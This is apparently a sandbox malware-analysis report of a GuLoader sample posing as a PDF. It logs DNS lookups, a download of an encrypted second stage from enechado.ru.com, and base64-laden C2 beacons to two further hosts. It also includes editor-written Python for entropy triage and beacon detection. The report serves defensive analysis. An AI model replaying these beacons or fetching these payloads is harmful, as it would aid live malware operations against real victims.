Nov 25, 2024 07:09:06.247828960 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.249748945 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.249799967 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.249833107 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.250081062 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.251852036 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.251899958 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:10.492691994 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:10.493031979 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:34.908680916 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:46.931726933 CET  49839  80     192.168.2.4      195.110.124.133
Nov 25, 2024 07:09:47.051229954 CET  80     49839  195.110.124.133  192.168.2.4
Nov 25, 2024 07:09:47.051331043 CET  49839  80     192.168.2.4      195.110.124.133
Nov 25, 2024 07:09:47.064893961 CET  49839  80     192.168.2.4      195.110.124.133
Nov 25, 2024 07:09:47.184353113 CET  80     49839  195.110.124.133  192.168.2.4
Nov 25, 2024 07:09:48.404817104 CET  80     49839  195.110.124.133  192.168.2.4
Nov 25, 2024 07:09:48.405020952 CET  80     49839  195.110.124.133  192.168.2.4
Nov 25, 2024 07:09:48.405138969 CET  49839  80     192.168.2.4      195.110.124.133
Nov 25, 2024 07:09:48.408066988 CET  49839  80     192.168.2.4      195.110.124.133
Nov 25, 2024 07:09:48.527467012 CET  80     49839  195.110.124.133  192.168.2.4
Nov 25, 2024 07:10:03.924897909 CET  49875  80     192.168.2.4      104.21.95.160
Nov 25, 2024 07:10:04.044482946 CET  80     49875  104.21.95.160    192.168.2.4
Nov 25, 2024 07:10:04.044589043 CET  49875  80     192.168.2.4      104.21.95.160
Nov 25, 2024 07:10:04.062268019 CET  49875  80     192.168.2.4      104.21.95.160
Nov 25, 2024 07:10:04.181838036 CET  80     49875  104.21.95.160    192.168.2.4
Nov 25, 2024 07:10:05.322365046 CET  80     49875  104.21.95.160    192.168.2.4
Nov 25, 2024 07:10:05.322870016 CET  80     49875  104.21.95.160    192.168.2.4
Nov 25, 2024 07:10:05.322973013 CET  49875  80     192.168.2.4      104.21.95.160
Nov 25, 2024 07:10:05.947310925 CET  49875  80     192.168.2.4      104.21.95.160
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Nov 25, 2024 07:09:03.209315062 CET  50781        53         192.168.2.4  1.1.1.1
Nov 25, 2024 07:09:03.864625931 CET  53           50781      1.1.1.1      192.168.2.4
Nov 25, 2024 07:09:46.140583992 CET  65512        53         192.168.2.4  1.1.1.1
Nov 25, 2024 07:09:46.923949957 CET  53           65512      1.1.1.1      192.168.2.4
Nov 25, 2024 07:10:03.450618982 CET  52944        53         192.168.2.4  1.1.1.1
Nov 25, 2024 07:10:03.922358990 CET  53           52944      1.1.1.1      192.168.2.4
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
Nov 25, 2024 07:09:03.209315062 CET  192.168.2.4  1.1.1.1  0x638b    Standard query (0)  enechado.ru.com            A (IP address)  IN (0x0001)  false
Nov 25, 2024 07:09:46.140583992 CET  192.168.2.4  1.1.1.1  0x7e3d    Standard query (0)  www.officinadelpasso.shop  A (IP address)  IN (0x0001)  false
Nov 25, 2024 07:10:03.450618982 CET  192.168.2.4  1.1.1.1  0x207a    Standard query (0)  www.vayui.top              A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                       CName                  Address          Type                   Class        DNS over HTTPS
Nov 25, 2024 07:09:03.864625931 CET  1.1.1.1    192.168.2.4  0x638b    No error (0)  enechado.ru.com            -                      103.83.194.50    A (IP address)         IN (0x0001)  false
Nov 25, 2024 07:09:46.923949957 CET  1.1.1.1    192.168.2.4  0x7e3d    No error (0)  www.officinadelpasso.shop  officinadelpasso.shop  -                CNAME (Canonical name) IN (0x0001)  false
Nov 25, 2024 07:09:46.923949957 CET  1.1.1.1    192.168.2.4  0x7e3d    No error (0)  officinadelpasso.shop      -                      195.110.124.133  A (IP address)         IN (0x0001)  false
Nov 25, 2024 07:10:03.922358990 CET  1.1.1.1    192.168.2.4  0x207a    No error (0)  www.vayui.top              -                      104.21.95.160    A (IP address)         IN (0x0001)  false
Nov 25, 2024 07:10:03.922358990 CET  1.1.1.1    192.168.2.4  0x207a    No error (0)  www.vayui.top              -                      172.67.145.234   A (IP address)         IN (0x0001)  false
                                                                • enechado.ru.com
                                                                • www.officinadelpasso.shop
                                                                • www.vayui.top
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49743        103.83.194.50   80                8088  C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
Timestamp  Bytes transferred  Direction  Data
Nov 25, 2024 07:09:04.002588987 CET  166  OUT  GET /tk.bin HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: enechado.ru.com
                                                                Cache-Control: no-cache
Nov 25, 2024 07:09:05.328820944 CET  1236  IN  HTTP/1.1 200 OK
                                                                Date: Mon, 25 Nov 2024 06:09:05 GMT
                                                                Server: Apache
                                                                Last-Modified: Mon, 25 Nov 2024 02:40:55 GMT
                                                                Accept-Ranges: bytes
                                                                Content-Length: 289856
                                                                Content-Type: application/octet-stream
                                                                Data Raw: e5 f1 c3 36 10 09 7e 10 91 e9 81 8b 2c 6b f5 d8 8b 21 eb 5d d6 e0 5b a3 a3 1a ad ba ee 91 22 6c 7b b8 78 4e 9a 46 69 7d a4 cd 27 52 f6 ce d5 29 29 52 1f c8 43 0d 84 be b4 62 44 57 31 78 88 d0 ed d2 67 4f 25 ca 44 e9 85 d6 66 3a 7f f0 85 68 86 d9 62 e3 38 94 68 94 93 6b a4 42 38 27 01 e9 0b d9 de 62 10 2d 8d 2e a6 9a 50 76 07 68 5f 41 18 ff c1 5b 9d a6 4a d9 ab d0 db 71 fd 29 dc ae cf f1 ef ff 95 58 97 03 6c 1a d1 ea 3f 0c 57 51 aa b8 af 96 56 b2 5a 8a 84 73 0a b2 fc 65 96 c5 94 fa 01 0e 40 98 9c 6f a0 42 d6 a8 23 27 4c 6a e6 b1 da bf 4e e9 d5 94 d4 34 12 0a 52 ce 3d 5e d2 aa 1d a2 fa d8 98 61 a8 79 6c 64 46 fb fc 6a 86 85 d3 0b 91 dd d3 3f 30 31 a5 34 27 da 75 34 a5 28 cd 24 0b 15 ee fa 54 69 4f b8 a8 d9 37 bf 0a ef 84 98 1d 2b f7 f9 c7 a4 a7 45 81 ff d6 73 97 44 2d c4 82 a6 84 b1 c7 77 35 ee f2 d7 a8 8a 57 9e 76 2b f2 eb aa eb 5f 5b 28 43 ce 72 11 c7 88 60 5b a8 99 78 cd 74 eb 90 57 04 72 25 38 7a e8 0f c7 e8 17 c5 ee 4a 07 99 e8 c0 8c ea 72 36 88 f1 6d 21 7e 1d f2 2e ce 77 44 72 87 90 e0 4d 4c 3e [TRUNCATED]
                                                                Data Ascii: 6~,k!]["l{xNFi}'R))RCbDW1xgO%Df:hb8hkB8'b-.Pvh_A[Jq)Xl?WQVZse@oB#'LjN4R=^ayldFj?014'u4($TiO7+EsD-w5Wv+_[(Cr`[xtWr%8zJr6m!~.wDrML>Z",d!Ki313?>X="v/OfVoZ?<a_;(Y7inpQY)!o{GG-KJ<L+l?J>?hdO&nDr3"ajq(DuIo`o]4z%zdQO!eW1+n}wIb:amsyxelF^4`Sfk/!^Sd?i:n}yKE8;/!~VvH|@M_/2'@nQ=R`Szg}14{!O$sF%Ux@%MX<I&Bid*=i+}o}<Fq?N<6H8/v<y01uu5T^x%b5ioPBk%VT9Qt\[7/}]>gl,SY][v3kHJK@:7NO([k%P;Z%*zIv.G^\NLBeHj- [TRUNCATED]
Nov 25, 2024 07:09:05.328905106 CET  224  IN  Data Raw: 55 71 14 85 f8 bd 54 fc e2 5b 6e 2e 97 f2 cb 78 ed 1d a9 ad e9 d4 ea a6 63 33 82 8e f6 b2 bb 0d 4d 7b ab cc aa ac 52 34 e1 71 85 ac 9c 52 6b ec a7 65 ab a7 c4 f2 e9 1e 8c 0e 62 83 6a b1 4e 41 77 e1 e9 b1 05 e5 25 9a a7 0b 81 db b9 c7 04 ab bc 16
                                                                Data Ascii: UqT[n.xc3M{R4qRkebjNAw%8yw,p>Rqd3o\9zde8Oi'Qy'(M$Ci&s(8IU8;TKxGl$K*R|_Dz5W
Nov 25, 2024 07:09:05.328944921 CET  1236  IN  Data Raw: c5 39 91 a2 89 8b 0e e3 dc 31 52 ae d3 15 de 79 96 8d d6 10 ad 02 aa 50 29 e5 1f b7 06 c5 68 a5 38 c0 5c 74 14 74 12 2d b1 04 ba 98 c8 0d 0c 65 eb 0d 74 54 95 34 4f 60 bd ba f2 03 4d d1 15 e8 59 a6 2d 65 94 1b 2a 8b 90 45 60 70 ca 84 79 91 64 bf
                                                                Data Ascii: 91RyP)h8\tt-etT4O`MY-e*E`pydp;*B|Y[5-sa$$P|G-r#2jaslsh/x}kC9JAhY U>yvqX;e-51)dXi,2%s+~,"_9J_
Nov 25, 2024 07:09:05.328957081 CET  224  IN  Data Raw: 64 51 4f c6 c3 e1 97 fc bb 04 a2 21 8b 65 57 bf 31 2b 6e 7d 77 49 b6 15 62 3a 61 d4 ab a6 8d e7 c0 e7 6d 13 ac 97 1b ee f2 73 79 78 0b 65 6c 46 b8 de 5e b6 f5 34 84 e6 60 08 53 e1 66 6b 17 b2 9e f0 06 2f 9e 09 e9 b8 eb 21 97 8a 5e fc 53 cc cc da
                                                                Data Ascii: dQO!eW1+n}wIb:amsyxelF^4`Sfk/!^Sd?i:n}yKE8;/!~VvH|@M_/2'@nQ=R`Szg}14{!O$sF%Ux@%MX<I&Bid*=i
Nov 25, 2024 07:09:05.329082966 CET  1236  IN  Data Raw: ca f1 ee 19 e4 d9 e5 93 2b 15 7d 96 6f fb 88 15 e5 9b 7d e7 01 3c ee 8b a7 96 c2 46 71 bd 3f 4e 98 3c ba ec 36 bc b1 06 48 38 b3 ef 2f 76 9d c6 3c 79 07 11 30 31 75 75 ac a4 35 05 9d 86 54 a9 89 f8 97 5e 78 25 18 62 c8 a4 35 ac 69 a9 6f 50 42 d6
                                                                Data Ascii: +}o}<Fq?N<6H8/v<y01uu5T^x%b5ioPBk%VT9Qt\[7/}]>gl,SY][v3kHJK@:7NO([k%P;Z%*zIv.G^\NLBeHj-WehQ
Nov 25, 2024 07:09:05.329094887 CET  1236  IN  Data Raw: a4 42 38 27 01 e9 0b d9 de 62 10 2d 8d 2e a6 9a 50 76 07 68 5f 41 18 ff c1 5b 9d a6 4a d9 ab d0 db 71 45 29 dc ae c1 ee 55 f1 95 ec 9e ce 4d a2 d0 a6 f2 2d 03 39 c3 cb 8f e6 24 dd 3d f8 e5 1e 2a d1 9d 0b f8 aa e0 da 63 6b 60 ea e9 01 80 2b b8 88
                                                                Data Ascii: B8'b-.Pvh_A[JqE)UM-9$=*ck`+ghJ`4R=^{#{*f7u,PL+Esw5\}+_[(Cru[htv.-~qy"Cs&)+E
Nov 25, 2024 07:09:05.329106092 CET  1236  IN  Data Raw: 4c 84 46 04 70 f9 8b 9c 27 19 3d a3 a1 80 63 a3 b3 be 9b bb e3 ab 34 29 6b a1 14 1a 87 59 9d 7f 6f 07 80 ad 7d 24 6f 80 bd b1 44 9a 08 b8 21 33 90 4d 45 7f 81 a0 e5 27 a7 93 c3 fd bc 2c 19 72 ba fc 1f d5 c0 c1 6c 66 ea 31 bb d5 a5 28 55 b6 e8 20
                                                                Data Ascii: LFp'=c4)kYo}$oD!3ME',rlf1(U {-\)2|?J0'g>[L@b#6\1S|aH{f+Q]44b;W%B)Gosphw'=/NY[,^45[DGfUBw)Cd"
Nov 25, 2024 07:09:05.329179049 CET  1236  IN  Data Raw: 28 42 ef aa 55 4b b6 e3 50 0e 45 9f 94 ca 38 f8 ec 6a 53 79 91 a1 a1 79 0e 19 fc bf b9 c7 c4 fa 0f c0 21 95 55 7f 8a f6 ce 2d 8d cb 52 76 c3 88 3f ba 00 5b 8f 07 07 a0 a4 70 06 db e0 2a c6 b9 a2 34 fe e5 bf 7c eb 0d 29 c2 ad 08 3a 8b 79 9f 45 15
                                                                Data Ascii: (BUKPE8jSyy!U-Rv?[p*4|):yEAirITJqR`Xu?-6*mL#q_lW#iN)a[D32nQbvUR$*9Vt?2E?@CNnBfa<yL/`=]A$Titpb5TxPBU?VT
Nov 25, 2024 07:09:05.329191923 CET  1236  IN  Data Raw: df 2e 64 3e 9b ec 6b 73 57 89 a6 4b 0a 46 05 f7 40 b7 58 62 d5 ba 25 f2 17 46 92 fe 0a f4 05 a9 f4 46 66 4e 8c 61 5d fa 0a c5 6b cd 8c 46 b3 a8 cd 1d 63 7e 0a 26 d1 d4 e1 60 90 71 f9 9b ce 59 35 5a d3 8b 12 98 94 af be 63 02 00 63 71 11 2e fb 31
                                                                Data Ascii: .d>ksWKF@Xb%FFfNa]kFc~&`qY5Zccq.12/XA-bj=(l_qRK>ARqx3Ckl:>b^g#jbF!U*1ZkqC*$J'W~0D!{`w/PW&tk#tm4%B
Nov 25, 2024 07:09:05.329202890 CET  552  IN  Data Raw: 00 87 ee 36 5c 64 db 95 5a fa 31 91 47 d9 c4 ab 9c 6f 70 45 38 bc fd e7 b2 9d ce d6 08 58 57 aa 04 58 74 d5 34 98 79 52 c3 fa 3b de 55 d9 79 1c f0 87 f5 b8 65 42 f8 fc 1a ff 7a e8 ce ad 26 ac 33 55 63 2b 88 2c a1 c8 2a d8 fd 4e 23 49 c6 41 bb 41
                                                                Data Ascii: 6\dZ1GopE8XWXt4yR;UyeBz&3Uc+,*N#IAAc90Ss]ud/)a){$O;MXhQr3XA9{_o?gb2%>Np<;XQhv=Rlhd'MlXs?_CPGas-W
Nov 25, 2024 07:09:05.448561907 CET  1236  IN  Data Raw: 1a 19 ab 04 70 c7 74 c4 c8 c7 36 90 96 95 d0 a9 4e c1 ab 0f 98 59 ee 41 3d 56 4f b1 69 df f7 7e dc fa 8e de 39 87 c4 8b d1 62 ce 52 61 ab 75 03 8e 3e 66 7d c0 b8 47 33 48 84 84 41 af 0c 38 71 dc d4 2f 82 68 34 b2 a5 56 85 f1 60 d5 84 84 65 b4 ba
                                                                Data Ascii: pt6NYA=VOi~9bRau>f}G3HA8q/h4V`e[JTL`I{|.mjTEws'a;yuXQ!d#,0$^'m[8T<`D?!j(X@9lm0Pj\T/Q
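A triage check on the /tk.bin response above, added here as an example and not part of the Joe Sandbox report. The 338 bytes in TK_BIN_HEAD are the bytes the report shows for the 200 OK body before its [TRUNCATED] marker (the full response is 289,856 bytes); the 203-byte HTML_404 is the Apache 404 body returned for GET /vlg0/ in session 1, used as a plaintext baseline. The function names and the 6.0 bits/byte threshold are the editor's own choices. Entropy close to 8 bits per byte with no MZ header is what an encrypted second stage looks like on the wire, which matches the GuLoader verdict: the downloader fetches an opaque blob and decrypts it in memory rather than pulling a plain PE.

```python
import math
from collections import Counter

# Copied from this report: the first 338 bytes the sandbox shows of the
# 200 OK body for GET /tk.bin (session 0). The report truncates the rest.
TK_BIN_HEAD = bytes.fromhex(
    "e5f1c33610097e1091e9818b2c6bf5d8" "8b21eb5dd6e05ba3a31aadbaee91226c"
    "7bb8784e9a46697da4cd2752f6ced529" "29521fc8430d84beb4624457317888d0"
    "edd2674f25ca44e985d6663a7ff08568" "86d962e338946894936ba442382701e9"
    "0bd9de62102d8d2ea69a507607685f41" "18ffc15b9da64ad9abd0db71fd29dcae"
    "cff1efff955897036c1ad1ea3f0c5751" "aab8af9656b25a8a84730ab2fc6596c5"
    "94fa010e40989c6fa042d6a823274c6a" "e6b1dabf4ee9d594d434120a52ce3d5e"
    "d2aa1da2fad89861a8796c6446fbfc6a" "8685d30b91ddd33f3031a53427da7534"
    "a528cd240b15eefa54694fb8a8d937bf" "0aef84981d2bf7f9c7a4a74581ffd673"
    "97442dc482a684b1c77735eef2d7a88a" "579e762bf2ebaaeb5f5b2843ce7211c7"
    "88605ba89978cd74eb9057047225387a" "e80fc7e817c5ee4a0799e8c08cea7236"
    "88f16d217e1df22ece7744728790e04d" "4c3e"
)

# Also copied from this report: the 203-byte Apache 404 body from session 1,
# a plaintext baseline to compare against.
HTML_404 = (
    b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    b"<html><head>\n"
    b"<title>404 Not Found</title>\n"
    b"</head><body>\n"
    b"<h1>Not Found</h1>\n"
    b"<p>The requested URL /vlg0/ was not found on this server.</p>\n"
    b"</body></html>\n"
)


def shannon_entropy(data: bytes) -> float:
    """Plug-in Shannon entropy in bits per byte (8.0 is the ceiling)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def is_pe(data: bytes) -> bool:
    """A Windows PE image starts with the DOS 'MZ' magic."""
    return data[:2] == b"MZ"


def triage_download(content_type: str, body: bytes, threshold: float = 6.0) -> dict:
    """Classify a fetched body. The threshold is the editor's choice: on a
    few hundred bytes of encrypted data the plug-in estimator lands around
    7.3 bits (it is biased low on short samples); HTML or text sits near 4.5.
    On the full 289 KB file an encrypted blob would read 7.9 or higher."""
    entropy = shannon_entropy(body)
    if is_pe(body):
        verdict = "pe-file"
    elif entropy >= threshold:
        verdict = "opaque-blob"
    else:
        verdict = "plaintext"
    return {
        "content_type": content_type,
        "entropy": round(entropy, 2),
        "pe": is_pe(body),
        "verdict": verdict,
    }


if __name__ == "__main__":
    print(triage_download("application/octet-stream", TK_BIN_HEAD))
    print(triage_download("text/html; charset=iso-8859-1", HTML_404))
```

On a full capture, run triage_download over the reassembled response body rather than the first segment; a packed but unencrypted PE would be caught by the MZ check, and an encrypted one by the entropy branch, so the two tests cover both ways a stage-two can arrive.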


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
1           192.168.2.4  49839        195.110.124.133  80                3496  C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe
Timestamp  Bytes transferred  Direction  Data
Nov 25, 2024 07:09:47.064893961 CET  471  OUT  GET /vlg0/?s42t_Nbx=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&F0vD=qVTlJB1hk6Wd HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Host: www.officinadelpasso.shop
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Nov 25, 2024 07:09:48.404817104 CET  367  IN  HTTP/1.1 404 Not Found
                                                                Date: Mon, 25 Nov 2024 06:09:48 GMT
                                                                Server: Apache
                                                                Content-Length: 203
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 6c 67 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49875        104.21.95.160   80                3496  C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe
Timestamp  Bytes transferred  Direction  Data
Nov 25, 2024 07:10:04.062268019 CET  712  OUT  POST /4twy/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate
                                                                Accept-Language: en-us
                                                                Host: www.vayui.top
                                                                Origin: http://www.vayui.top
                                                                Referer: http://www.vayui.top/4twy/
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 205
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                Data Raw: 73 34 32 74 5f 4e 62 78 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 78 39 72 38 66 73 62 6d 7a 32 4f 38 69 4d 43 57 46 50 57 4d 78 43 6a 49 6e 6b 36 6d 67 66 6a 48 6c 72 69 50 6d 41 63 33 58 34 73 55 46 69 39 69 48 79 79 67 79 72 4f 45 48 2f 54 4f 58 43 45 4c 41 34 2b 2f 4f 64 58 46 48 64 49 39 6a 53 79 6f 45 79 35 38 62 35 77 75 31 54 57 6d 2f 45 71 53 37 49 4b 63 69 72 54 35 66 57 49 33 75 66 4a 47 4a 43 61 54 39 59 31 6e 68 73 35 6a 46 6f 51 57 34 65 6e 6e 68 62 63 7a 6f 4e 4f 37 78 69 64 6b 73 6e 4e 35 54 48 59 48 68 58 6d 30 4a 39 35 46 73 55 50 67 57 45 45 6d 71 6c 6d 4f 56 49 72 31 64 71 4d 43 32 51 3d 3d
                                                                Data Ascii: s42t_Nbx=rDqkmhD2LOnTx9r8fsbmz2O8iMCWFPWMxCjInk6mgfjHlriPmAc3X4sUFi9iHyygyrOEH/TOXCELA4+/OdXFHdI9jSyoEy58b5wu1TWm/EqS7IKcirT5fWI3ufJGJCaT9Y1nhs5jFoQW4ennhbczoNO7xidksnN5THYHhXm0J95FsUPgWEEmqlmOVIr1dqMC2Q==
Nov 25, 2024 07:10:05.322365046 CET  877  IN  HTTP/1.1 404 Not Found
                                                                Date: Mon, 25 Nov 2024 06:10:05 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BEwHlfkuX1XBoKn060kgOYQVkjIkdeCrBYmcS1n4baMNJm3QfEvFO4Yk3k3h8G8sxB4vf29TZj4c%2BmdukNc2eU5n87BwRj2KZtYO9XsDdgIdHL1c0MbRnJDb119sRSYA"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e7f793d6f090cae-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1493&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=712&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
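The two requests from the dropped cXGDMXIloFhOE.exe (sessions 1 and 2) share a shape that is worth encoding as detection logic: a single short directory as the path, one parameter carrying a long base64-looking value (query string on the GET, form body on the POST), the same parameter name reused across two unrelated hosts, and a User-Agent claiming Firefox 29 on Windows NT 6.2. The following is an added example by the editor, not Joe Sandbox code or a Suricata rule; the three request records are copied from this page, the GuLoader GET /tk.bin is included as a contrast case, and the regexes and indicator names are the editor's heuristics drawn from these two requests only. The paths /vlg0/ and /4twy/ and the parameter name s42t_Nbx are specific to this build and are not treated as stable indicators.

```python
import re
from urllib.parse import urlsplit

# Request records copied from sessions 0, 1 and 2 of this report.
REQUESTS = [
    {"method": "GET", "target": "/tk.bin", "host": "enechado.ru.com",
     "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0",
     "body": b""},
    {"method": "GET",
     "target": "/vlg0/?s42t_Nbx=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a"
               "+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&F0vD=qVTlJB1hk6Wd",
     "host": "www.officinadelpasso.shop",
     "ua": "Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0",
     "body": b""},
    {"method": "POST", "target": "/4twy/", "host": "www.vayui.top",
     "ua": "Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0",
     "body": b"s42t_Nbx=rDqkmhD2LOnTx9r8fsbmz2O8iMCWFPWMxCjInk6mgfjHlriPmAc3X4sUFi9iHyygyrOEH/"
             b"TOXCELA4+/OdXFHdI9jSyoEy58b5wu1TWm/EqS7IKcirT5fWI3ufJGJCaT9Y1nhs5jFoQW4ennhbczoNO7"
             b"xidksnN5THYHhXm0J95FsUPgWEEmqlmOVIr1dqMC2Q=="},
]

# Editor's heuristics, derived from the two beacons on this page.
SHORT_DIR = re.compile(r"^/[a-z0-9]{3,6}/$")
B64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
LEGACY_FF_UA = re.compile(r"Windows NT 6\.[0-3]; rv:\d+\.0\) Gecko/20100101 Firefox/\d+\.0$")


def _params(qs: str) -> dict:
    """Split a query string or form body on '&' and the first '='.
    urllib's parse_qsl would turn '+' into a space, which destroys base64."""
    out = {}
    for pair in qs.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            out[key] = value
    return out


def beacon_indicators(req: dict) -> list:
    """Return the editor's indicator codes that fire on one request."""
    parts = urlsplit(req["target"])
    hits = []
    if SHORT_DIR.match(parts.path):
        hits.append("short_dir")
    raw = parts.query if req["method"] == "GET" else req["body"].decode("ascii", "replace")
    blobs = [k for k, v in _params(raw).items() if B64ISH.match(v)]
    if len(blobs) == 1:
        hits.append("b64_blob")
    if LEGACY_FF_UA.search(req["ua"]):
        hits.append("legacy_ua")
    return hits


def is_formbook_like(req: dict) -> bool:
    """The two structural indicators are required; the UA is supporting evidence."""
    hits = beacon_indicators(req)
    return "short_dir" in hits and "b64_blob" in hits


def shared_param_names(reqs: list) -> set:
    """Parameter names carrying a base64 blob to more than one host. A name
    reused across hosts ties the beacons to one implant configuration."""
    hosts_by_name = {}
    for req in reqs:
        parts = urlsplit(req["target"])
        raw = parts.query if req["method"] == "GET" else req["body"].decode("ascii", "replace")
        for key, value in _params(raw).items():
            if B64ISH.match(value):
                hosts_by_name.setdefault(key, set()).add(req["host"])
    return {k for k, hosts in hosts_by_name.items() if len(hosts) > 1}


if __name__ == "__main__":
    for req in REQUESTS:
        print(req["method"], req["host"], beacon_indicators(req), is_formbook_like(req))
    print("parameter names shared across hosts:", shared_param_names(REQUESTS))
```

Both 404 responses are expected: the implant walks a list of C2 domains, most of which are decoys or not yet live, so a 404 does not mean the traffic is benign. The host-to-host parameter reuse is the check that survives path and domain rotation.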



                                                                Target ID:0
                                                                Start time:01:07:57
                                                                Start date:25/11/2024
                                                                Path:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"
                                                                Imagebase:0x400000
                                                                File size:991'098 bytes
                                                                MD5 hash:F33B6E1067BF27D4BEA237206532881E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2279952126.0000000004C51000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:01:08:56
                                                                Start date:25/11/2024
                                                                Path:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
